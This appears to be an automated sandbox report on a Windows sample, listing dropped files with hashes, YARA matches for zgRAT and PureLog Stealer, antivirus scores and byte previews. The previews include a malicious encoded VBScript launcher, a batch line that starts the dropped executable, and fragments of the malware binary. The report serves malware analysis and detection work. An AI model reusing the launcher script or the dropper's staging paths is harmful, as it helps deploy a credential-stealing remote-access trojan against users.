                                                                                            Preview:vYMIKpBPB3nAPKtxWeQBaCJBnqFk1oSMy4DR28w1WvMfdLWtTo7u2qptPKfekbXWlaMUHc4YsYpp0ohcUVRMqhUHOTCrcRR5Xz3D8Bm1tjBdA
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):16625664
                                                                                            Entropy (8bit):2.032052063403891
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:9ArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIM:9t8hZ+2Muz/EeaLx1S9Rmf
                                                                                            MD5:497FE9F6B69ACEB2358177C4DF4DE1FE
                                                                                            SHA1:F97F54F6F818DD07BEE82A3E2A3D1412F1852B60
                                                                                            SHA-256:E2BBF9A32FE44B74F907748517D4FF3C618D3E13AD667B8886F2F2BE4A59C4FE
                                                                                            SHA-512:82BBB737B5237BD81BFECC713D8F85BAB12C2FFB4486FB572F8F66F1DD5C7D7125D6F4A28616CDC2AE6F8F2398A0D4F51EC6A9F58131A04365F7761E8AAC7D2D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.g............................n.... ..../...@.. .......................@/...........@................................. ...K...../. .................... /...................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...../.....................@....reloc....... /.....................@..B................P.......H.......................X...).$..........................................0..........(.... ........8........E............*...N...8....*(.... ....~{...{i...9....& ....8....(.... ....~{...{....9....& ....8....(.... ....8........0.......... ........8........E....=...............s.......88...8.... ....8....~....:.... ....~{...{....:....& ....8....~....(N... .... .... ....s....~....(R....... ....8p.......~....(V...~....(Z... ....<.... ....8D...r...ps....z*...... ....~{...{....:....
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):576
                                                                                            Entropy (8bit):5.8608860919157255
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:v38afebOktiJzE2OvFuwXCFuUOJynoWvz2pgFjc92GDEepf0RBgAQG:v3HM4Q5uwX4OY7bsg6tMRq1G
                                                                                            MD5:5C2E1EE01DE00067C2FFBA038B706B23
                                                                                            SHA1:8B973D952AA06305958B5972599164F680016A52
                                                                                            SHA-256:33393F7DF190C3ABFC271B715D4BFB9832BCCB0F42790A287E78CAC9CFD6A37D
                                                                                            SHA-512:BA19D8D45BEF465B7832E5817B917992A3CB4F811FC59D604B20F552E9C56A399E9EBBD1E3E3F01DCC1BFC69D426040A6BFF53E3963D7CBC99647E727D1D7509
                                                                                            Malicious:false
                                                                                            Preview:De1FEgi2XASs2WcIalnwQ2SjTG1YOkzfkxcYhs0sn2L6wizysTFtWuTLMRw8oJoxLxIE4Elsu5IXqWxuQCq4fFJzeQMP61EdOXv8au4osW8al5fzdBsldtSFoSko1Vw31pJSlyUgIBMIHsOivWw4JcAeEpUHJQwWjFj6wMOorLcbhK75EC2fj2tYooN5eMW2PzjBISwiIHM7Ai64rYDHXRxrVLRH8SKezkMsk6wwPTXbpwYGsSNFJOe7C2q7Aokz7sIZWOUvlR1D4VBjxKZpFFVkGOpsPzvlthe7n8ue8bd2XaDr0HKzP4u2WiTHilgwfQUW0E5ya5rnldMpL81Ip5VzxmkEpm5X5rWGGq0wLVYUNGQ3Vo6ktXHk4eiNd0Iy9Tr4HGjeHF6TgBmqWrtBqVnhjwLlHnSUMkU3ZVwPEbcnaxD3221wHHIopJUU57WewmG6qsRA4e6O2AGvsRsPvgNFcqNPBbUHF80yrHMKk11nL3vpDimnPGtQYBdAeC8dKzJ4JSElFip3ok3j4iMczr28PkZqnLpi2XcWu1gueAhqbzmyH4G6zgod6Loj2Y83
                                                                                            Process:C:\Users\user\Desktop\Ccp3sJPDXs.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):78
                                                                                            Entropy (8bit):5.055708027055919
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:41sA0xfZTBNGEZIy0ZK8KQ4A:40fdVZItZKnA
                                                                                            MD5:3BB0B4ADF8E075D1C63008996A935373
                                                                                            SHA1:8C504820DFD8A44DE3DC316564E37EDDD8703650
                                                                                            SHA-256:FBD0FD180A02FC6A2A7EC81342F478EEF7CAFEF368A396D43020D141D4C1566A
                                                                                            SHA-512:97FB3F0251C8C0AB39EACA743249774ED8CD6E7184429EA2366F14DDE5B352C21BF4CB4427B71346EC14793CB51EB23EA3ADD8B45383A6C4015EADC1BBD77A24
                                                                                            Malicious:false
                                                                                            Preview:%xPiiWjZXN%%jJlKQsmiWZh%..%KkQ%"C:\SavesHost/Blockbrowser.exe"%RoWNToonnyrUoB%
                                                                                            Process:C:\Users\user\Desktop\Ccp3sJPDXs.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):229
                                                                                            Entropy (8bit):5.84858548842881
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GbvwqK+NkLzWbH+8nZNDd3RL1wQJR3PjOnvQ4RmqLbWl:GKMCzWL+4d3XBJFivQcdLbWl
                                                                                            MD5:6D3D837C5E2A84347956866C26E1F7DC
                                                                                            SHA1:701721298551FB055D0932E6420F6AE2BFA8A837
                                                                                            SHA-256:CCF3360C49A144B1453CBEFAAFCADF189C3F9CA2CDC7FFEFF8E8CCEB08E01C57
                                                                                            SHA-512:EAF8AF1B791055885BAFE867C14AB2A0EBF53A3349D98ECC1B463D343508E428C0E4012119E56B4D05C6A16036402E93F8255B1A975BD05F64663F4A5E3020F7
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vcT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ?C7+kCWkYJ&*5K4y}C*!KE0$\\q2l;!h2aC`D$|nHbF.2FAYkHBO0R4COr~~!B~6lsk+CkEAAA==^#~@.
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):16625664
                                                                                            Entropy (8bit):2.032052063403891
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:9ArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIM:9t8hZ+2Muz/EeaLx1S9Rmf
                                                                                            MD5:497FE9F6B69ACEB2358177C4DF4DE1FE
                                                                                            SHA1:F97F54F6F818DD07BEE82A3E2A3D1412F1852B60
                                                                                            SHA-256:E2BBF9A32FE44B74F907748517D4FF3C618D3E13AD667B8886F2F2BE4A59C4FE
                                                                                            SHA-512:82BBB737B5237BD81BFECC713D8F85BAB12C2FFB4486FB572F8F66F1DD5C7D7125D6F4A28616CDC2AE6F8F2398A0D4F51EC6A9F58131A04365F7761E8AAC7D2D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.g............................n.... ..../...@.. .......................@/...........@................................. ...K...../. .................... /...................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...../.....................@....reloc....... /.....................@..B................P.......H.......................X...).$..........................................0..........(.... ........8........E............*...N...8....*(.... ....~{...{i...9....& ....8....(.... ....~{...{....9....& ....8....(.... ....8........0.......... ........8........E....=...............s.......88...8.... ....8....~....:.... ....~{...{....:....& ....8....~....(N... .... .... ....s....~....(R....... ....8p.......~....(V...~....(Z... ....<.... ....8D...r...ps....z*...... ....~{...{....:....
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):126
                                                                                            Entropy (8bit):5.51943991945982
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:7UsRL+MMWMDMoX2pmZKhjLSRHLZXLeCsCDSGk14BLGt2dyCWDuKp:7p/McoXpKh3KhsCOn14BLGE3WaKp
                                                                                            MD5:8BAF8158438A984F510B5A1ABDC93B7E
                                                                                            SHA1:BF228C3748396C5EBDF21C54244722BEE336621D
                                                                                            SHA-256:311F3D2A9C869941A8BACFBC4528F09DDDAEF6BE4121BD34B7D9528B8B2DC340
                                                                                            SHA-512:7EF0AE3059B0431A981E5A351971E63A47B618FD8D7CFB50B3E995EE9D3399C5E5571CC3E8508A66B80BC7D16862A352F0F431CDE7D82FE2226AAF535E9739C5
                                                                                            Malicious:false
                                                                                            Preview:xRODW97jBuxvBfY4nuglUi8kgfViflhuMxpSLw0DRh1Ac9dYNiI2FnwOToh0nZEaMCiOzFt03cUxr7IgB7U7cooiAb9hP9Z2dbyZaPiHzS9nT9hWgAzqEG7hYANYGL
                                                                                            Process:C:\Users\user\Desktop\Ccp3sJPDXs.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):16625664
                                                                                            Entropy (8bit):2.032052063403891
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:9ArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIM:9t8hZ+2Muz/EeaLx1S9Rmf
                                                                                            MD5:497FE9F6B69ACEB2358177C4DF4DE1FE
                                                                                            SHA1:F97F54F6F818DD07BEE82A3E2A3D1412F1852B60
                                                                                            SHA-256:E2BBF9A32FE44B74F907748517D4FF3C618D3E13AD667B8886F2F2BE4A59C4FE
                                                                                            SHA-512:82BBB737B5237BD81BFECC713D8F85BAB12C2FFB4486FB572F8F66F1DD5C7D7125D6F4A28616CDC2AE6F8F2398A0D4F51EC6A9F58131A04365F7761E8AAC7D2D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\SavesHost\Blockbrowser.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\SavesHost\Blockbrowser.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.g............................n.... ..../...@.. .......................@/...........@................................. ...K...../. .................... /...................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...../.....................@....reloc....... /.....................@..B................P.......H.......................X...).$..........................................0..........(.... ........8........E............*...N...8....*(.... ....~{...{i...9....& ....8....(.... ....~{...{....9....& ....8....(.... ....8........0.......... ........8........E....=...............s.......88...8.... ....8....~....:.... ....~{...{....:....& ....8....~....(N... .... .... ....s....~....(R....... ....8p.......~....(V...~....(Z... ....<.... ....8D...r...ps....z*...... ....~{...{....:....
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):16625664
                                                                                            Entropy (8bit):2.032052063403891
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:9ArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIM:9t8hZ+2Muz/EeaLx1S9Rmf
                                                                                            MD5:497FE9F6B69ACEB2358177C4DF4DE1FE
                                                                                            SHA1:F97F54F6F818DD07BEE82A3E2A3D1412F1852B60
                                                                                            SHA-256:E2BBF9A32FE44B74F907748517D4FF3C618D3E13AD667B8886F2F2BE4A59C4FE
                                                                                            SHA-512:82BBB737B5237BD81BFECC713D8F85BAB12C2FFB4486FB572F8F66F1DD5C7D7125D6F4A28616CDC2AE6F8F2398A0D4F51EC6A9F58131A04365F7761E8AAC7D2D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\SavesHost\SgrmBroker.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\SavesHost\SgrmBroker.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.g............................n.... ..../...@.. .......................@/...........@................................. ...K...../. .................... /...................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...../.....................@....reloc....... /.....................@..B................P.......H.......................X...).$..........................................0..........(.... ........8........E............*...N...8....*(.... ....~{...{i...9....& ....8....(.... ....~{...{....9....& ....8....(.... ....8........0.......... ........8........E....=...............s.......88...8.... ....8....~....:.... ....~{...{....:....& ....8....~....(N... .... .... ....s....~....(R....... ....8p.......~....(V...~....(Z... ....<.... ....8D...r...ps....z*...... ....~{...{....:....
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):165
                                                                                            Entropy (8bit):5.641644187696277
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:eGrQHU+xiGwL8yDXrsPVDTYZVlURhQjnskNqv8sHeKiijf3PpDoMhAAz0hgRpg:LSU+xl3qbuBHuskkv84jf31KAz0hgM
                                                                                            MD5:438A65DD4D7E40E6E3A77C49D433FCF8
                                                                                            SHA1:FE9F2639D1ABB14BAEFD9FBFC866045146D8536B
                                                                                            SHA-256:70032C5C5D1403971462925CDAEE5921AF982A89CA4D542BBC66D0207FD1D9DB
                                                                                            SHA-512:C3E0E607D6AA472991A0D78FD587807D6144C6B86FD0392D206493F8191D2D52191372CC55B27C5263DECC8227F031CC7266853118F0DEEF9BA737FE18BE3E5E
                                                                                            Malicious:false
                                                                                            Preview:PKLqDGEGxaN5bHuRAuedTtacHg0HNZbEZICvMJ0734yagokWQt3zIj0ftsihP73Y8IfSF9E14hkY496c5d0egl50RgBekTr5BacXJRRRoB5l8bluwGlwGY1XNoBj7kRlzoXegiToMjzfqT105Qsdr5zmiFKeQrTEtTwUE
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):16625664
                                                                                            Entropy (8bit):2.032052063403891
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:9ArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIM:9t8hZ+2Muz/EeaLx1S9Rmf
                                                                                            MD5:497FE9F6B69ACEB2358177C4DF4DE1FE
                                                                                            SHA1:F97F54F6F818DD07BEE82A3E2A3D1412F1852B60
                                                                                            SHA-256:E2BBF9A32FE44B74F907748517D4FF3C618D3E13AD667B8886F2F2BE4A59C4FE
                                                                                            SHA-512:82BBB737B5237BD81BFECC713D8F85BAB12C2FFB4486FB572F8F66F1DD5C7D7125D6F4A28616CDC2AE6F8F2398A0D4F51EC6A9F58131A04365F7761E8AAC7D2D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.g............................n.... ..../...@.. .......................@/...........@................................. ...K...../. .................... /...................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...../.....................@....reloc....... /.....................@..B................P.......H.......................X...).$..........................................0..........(.... ........8........E............*...N...8....*(.... ....~{...{i...9....& ....8....(.... ....~{...{....9....& ....8....(.... ....8........0.......... ........8........E....=...............s.......88...8.... ....8....~....:.... ....~{...{....:....& ....8....~....(N... .... .... ....s....~....(R....... ....8p.......~....(V...~....(Z... ....<.... ....8D...r...ps....z*...... ....~{...{....:....
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):95
                                                                                            Entropy (8bit):5.6341308400195675
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NXbXSYTJ3Nfvj5l3D0AjPkgBiH:NXbXFTJ3Nflt/AgBO
                                                                                            MD5:D8AFE165DC14DD7B04DFBE0DC48D4D7E
                                                                                            SHA1:DFAF4F33B9858A2410E92C26C6A47E0A3668127B
                                                                                            SHA-256:AACCAA01099AB0C3E4B22043C9F6E35001A802DB886A454584D8BB24C5CF1D6E
                                                                                            SHA-512:A618013AF15CD69C8858625FE7A2D2A7CC52E1C4504007186B4F59A6A76433F5519CD6C162AF8BD6BC1131B144029523F83FF2EB606EF92019F03D487DD6A051
                                                                                            Malicious:false
                                                                                            Preview:pqwZrl0rg1NFwYPRbHxupuhidslfMjSWoTpY9b2mwQkLFiPAFVXPIha4JN589Ue6j0bct0RAPL7YKWc4cka0MDOG3uPvf3m
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with very long lines (446), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):446
                                                                                            Entropy (8bit):5.83284890248151
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:wQOGapldaiE1/f1DwKN8LXOGzxFP1bJQ6guwNzJg/V3tuAIxiJ00s1NAJ9HnTAWX:fODE1n1DU/tQbNAlIxGkNsdnsWX
                                                                                            MD5:F711BBA35896F5CDDB368AD1E41221FD
                                                                                            SHA1:6B8C0069F015D0D106F86ECF97EE3C71590D9CD9
                                                                                            SHA-256:B6BED8A5E328755A4A15A18675FE7EB8661B32999293F7B7757A526A58053871
                                                                                            SHA-512:F59E2CDB4DE5410DC4556DEB8127DBECF13B156B6CA85343C383733645433B7971AC8A170EC1C247808C0B34D7800245BB1C8A621A3E0A25C66A826D5F8C1B54
                                                                                            Malicious:false
                                                                                            Preview:8yJLga8kjsFssWt9ZiM72FCnxUyVrjFD4YhzTvoOkRyPyKYohHIQ0Ei2vfXLlm39mByTz3qo47WlRxyn6JykazN0zoExXcm7XzmxWEznbeV2r7l8qtOcyTixx7eKz2QbUYNbKBR2UKI6dUI2DFHnOKJEQz9YkpyiN4hTuJxpcWHoKmTczlHtvmNKPILVB3SpWjsjxzI3RbL1Ce4ofhj8iExlrXEl8bniDcSk3upAdNcTbVHuOh0eUUHRwH1Zug5zxmyjMTuv1ieUmeJVPTWalJOtVAyv2QP6Smfzhhi5wFmvzwpR8fJbJeOoXEOLe82lThCA8Uysvbnggd3iVgxWGxxxX0bcTXaxMBbSuoTnrbqs0rI3Lpz8LfeguOmH3WYYBzTeClyrNKppHE6qshQnhbmqg5hfCLuUCSrAXn1k1IuB0zYpS6ZVFv0jNn8GDT
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1613
                                                                                            Entropy (8bit):5.370675888495854
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qVGqZ4x
                                                                                            MD5:61E69F423BF19DBBAA81DED6FA7018BB
                                                                                            SHA1:AFDA34428E1A7EDDB88DBDE13DD3DF5F9B142ACF
                                                                                            SHA-256:2AF4D2CFBC37608B0B546465746CB59F8CC04AECD62246BBF4771894A7118340
                                                                                            SHA-512:2580AE9695D3D637239D50442388F1823BDFD218BD8FE155938EE43DC5EE9999032767AD0F0CF18948891D9CA92E2B6D80401993FFECF235CFFE89E1D7029B08
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1510207563435464
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulTkklh:NllUokl
                                                                                            MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                                            SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                                            SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                                            SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                                            Malicious:false
                                                                                            Preview:@...e................................................@..........
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.133660689688186
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:meToy7cm:meMgcm
                                                                                            MD5:2AB59A2A24BB008D4BC5CF9158BCA840
                                                                                            SHA1:A08A3F07DC8614804C59AEFC4F76953AEE6FFB91
                                                                                            SHA-256:6E7FA9B94D1FB16918E4F62524B39B9A586CF45C1897D059929366148AC5340A
                                                                                            SHA-512:C4636F0217A0C3E47844D9BE3C93181F3451370E6F2AD3DD860BC73B0391013554B7E0AE9A1980C8A505AC1C2E5DF47FE269AD7D6B77A79FFA24A25B7D619F62
                                                                                            Malicious:false
                                                                                            Preview:xLor2x44zu6bYzXeQvvWhhvyC
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
